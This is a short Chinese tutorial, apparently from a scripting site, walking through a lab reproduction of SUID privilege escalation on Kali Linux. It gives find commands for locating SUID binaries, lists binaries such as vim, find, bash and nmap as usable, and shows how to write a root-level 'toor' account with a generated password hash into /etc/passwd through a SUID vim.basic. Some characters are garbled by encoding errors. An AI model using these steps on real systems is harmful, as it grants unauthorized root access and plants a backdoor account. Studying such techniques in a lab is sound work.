在kali上復(fù)現(xiàn)
先給需要的vim.basic文件設(shè)置suid權(quán)限
chmod u+s /usr/bin/vim.basic
先adduser test1一個(gè)普通權(quán)限用戶
現(xiàn)在就是一個(gè)合適的提權(quán)環(huán)境
通過以下命令可以找到存在suid權(quán)限的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
可用于提權(quán)的文件有
- nmap
- vim
- find
- bash
- more
- less
- nano
- cp
利用vim提權(quán)的思路是修改etc/passwd文件���,為自己添加一個(gè)有root權(quán)限的用戶
passwd文件用戶格式為:用戶名:密碼:uid:gid:注釋:home目錄:用戶的shell
這邊可以看看root用戶的格式
root:x:0:0:root:/root:/bin/bash
(密碼這部分之所以是x,是因?yàn)檎嬲拿艽a存在/etc/shadow文件里)
生成密碼:用openssl passwd -1 –salt asd 123 (這里是-1(數(shù)字1)不是L)
直接寫在passwd文件里面�����,
toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash
用vim /etc/passwd可以修改�,但是在保存是會(huì)出現(xiàn)E212,無法保存��,提示我們沒有權(quán)限修改這個(gè)
這時(shí)應(yīng)該用之前find找到的vim.basic文件運(yùn)行�����,這個(gè)程序是有suid權(quán)限的�。絕對(duì)可以修改
vim.basic /etc/passwd
用這個(gè)打開,然后修改文件����,就可以成功保存
可以看到已經(jīng)添加了,su toor切換��,密碼123,再id查看一下權(quán)限
root權(quán)限
chmod u+s /usr/bin/vim.basic
以上就是本文的全部內(nèi)容��,希望對(duì)大家的學(xué)習(xí)有所幫助����,也希望大家多多支持腳本之家。
